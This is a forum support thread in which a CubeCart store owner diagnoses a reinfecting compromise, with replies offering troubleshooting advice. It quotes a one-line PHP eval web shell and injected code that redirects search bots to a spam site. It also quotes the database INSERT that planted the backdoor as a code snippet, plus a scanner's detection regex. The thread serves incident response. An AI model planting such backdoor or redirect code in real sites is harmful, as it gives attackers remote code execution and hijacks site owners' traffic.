jpayam Posted July 25, 2015 Share Posted July 25, 2015 Hello,I use last cubecart.i see i A php file (snippet_892d667b445c9ebb6888107b8124a8.php) on /includes/extra directory which include the below code:<?php eval($_REQUEST["H6GrD"]);?>this file recreate automatically again and again after i delete it !!! this code adding below code to my index.php file.if (preg_match("#(google|googlebot|slurp@inktomi|yahoo! slurp|msnbot)#si", $_SERVER['HTTP_USER_AGENT'])) {header("HTTP/1.1 301 Moved Permanently");header("Location: http://www.reehair.com/");exit;}if (preg_match("#(www\.google)#si",$_SERVER['HTTP_REFERER'])) {header("HTTP/1.1 301 Moved Permanently");header("Location: http://www.reehair.com/");exit;} now i am losing my seo links in search enginesthanks in advance for any help Quote Link to comment Share on other sites More sharing options...
ayz1 Posted July 25, 2015 Share Posted July 25, 2015 seems similar to this https://forums.cubecart.com/topic/50036-site-hijacked-by-modifying-controllerscontrollerincphp/ Quote Link to comment Share on other sites More sharing options...
havenswift-hosting Posted July 26, 2015 Share Posted July 26, 2015 This is exactly the same as that other report and is something we have seen on quite a few sites over the last 7 to 10 days. There is absolutely no point in simply deleting the code or replacing the file without discovering and plugging the mechanism through which they are gaining access as it is anautomated system that looks for and inserts this code.This has been found to be caused mostly by having old and insecure versions of other software installed within the same hosting account such as forum (phpBB) or CMS (WordPress and Joomla) - if you have any other software installed alongside your CubeCart software you MUST always keep this right up to date as they have all had serious security issues disclosed and fixed over the recent months. Any software installed but not being used should be deleted and not just moved. It can also be caused by insecure hosting where access is gained through another account with a vulnerability which is common with cheap shared hosting - if you value your CubeCart store then get decent hosting !Ian Quote Link to comment Share on other sites More sharing options...
jpayam Posted July 26, 2015 Author Share Posted July 26, 2015 We use a vps for this store, we have not any other scripts ,only one site with last cubecart script.php ver is last 5.4 with suhosin enabled , all dangerous PHP functions disabled in php.ini file.CSF is active , modesecurity with last COMODO rules is active.calmAV and ConfigServer eXploit Scanner Scan did not find any Fingerprint matches ConfigServer eXploit Scanner only find a Suspicious matches:'/home/XXXXXXXXXX/public_html/cache/75590.sql.1efdd7b03693b5f7a93ef2d228d5e98c.cache'Regular expression match = [eval\(\$_REQUEST\[]i empty cash folder and even disable the cash temporary but still problem not fixed Quote Link to comment Share on other sites More sharing options...
havenswift-hosting Posted July 26, 2015 Share Posted July 26, 2015 Csf, cxs and mod_security woukdnt pick this type of file change up - you will need to analyse server logs to determine the method of accessIan Quote Link to comment Share on other sites More sharing options...
jpayam Posted July 26, 2015 Author Share Posted July 26, 2015 Yes, thanksproblem is from my database seems it infected before i install the modesecurity. as i install a fresh cubecart on another site and works without problem but when i import my database to new site i see the problem again (file snippet_892d667b445c9ebb6888107b8124a8.php) on /includes/extra directory )how can i clean my database?? i want to keep store setting products and customers and orders Quote Link to comment Share on other sites More sharing options...
jpayam Posted July 26, 2015 Author Share Posted July 26, 2015 below code was in my database i just clean it and seems problem fixed-- Dumping data for table `CubeCart_code_snippet`--LOCK TABLES `CubeCart_code_snippet` WRITE;/*!40000 ALTER TABLE `CubeCart_code_snippet` DISABLE KEYS */;INSERT INTO `CubeCart_code_snippet` VALUES (1,1,'snippetH6GrD','Snippet','controller.index','<?php eval($_REQUEST[\"H6GrD\"]);?>','','',3);/*!40000 ALTER TABLE `CubeCart_code_snippet` ENABLE KEYS */;UNLOCK TABLES; Quote Link to comment Share on other sites More sharing options...
bsmither Posted July 26, 2015 Share Posted July 26, 2015 On your database server, would you happen to have it set to log to a General Log?I can understand if it's not. Without some highly disciplined routine maintenance (or a cron job) to rotate out the logs, it could get quite large.If you do have a General Log for the database server, you may be able to tell exactly when this record was first inserted into the database, and examine all the nearby database activity. Then correlate the date/time to the site's web server access log.There might even be an entry in CubeCart's Staff Access Log for that date/time. Quote Link to comment Share on other sites More sharing options...
jpayam Posted July 26, 2015 Author Share Posted July 26, 2015 I have not log for mysql on server, my site hacked two times and every time i see below System Erros Log within the Cubecart panel.Yesterday, 13:44 [Deprecated] /home/XXXXXXXXXXXXXXX/domains/XXXXXXXXXXX/public_html/includes/extra/snippet_892d667b445c9ebb6888107b8121a8.php(1) : eval()'d code(1) : eval()'d code:1 - Function set_magic_quotes_runtime() is deprecated Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.